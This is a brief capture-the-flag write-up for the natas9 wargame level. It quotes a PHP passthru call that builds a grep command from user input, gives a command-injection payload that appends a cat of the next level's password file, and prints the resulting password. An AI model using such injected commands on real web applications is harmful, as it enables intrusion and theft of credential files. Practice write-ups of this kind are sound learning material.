← Back
natas9 | Avishai’s CTF Writeups

Avishai's CTF Writeups

Yalla Balagan! A collection of my CTF writeups and solutions.

View on GitHub

in this challenge we use command injection, this is the vuln part: passthru("grep -i $key dictionary.txt");

and this is the payload we gives ; cat /etc/natas_webpass/natas10

Flag: t7I5VHvpa14sJTUGV0cbEsbYfFP2dmOu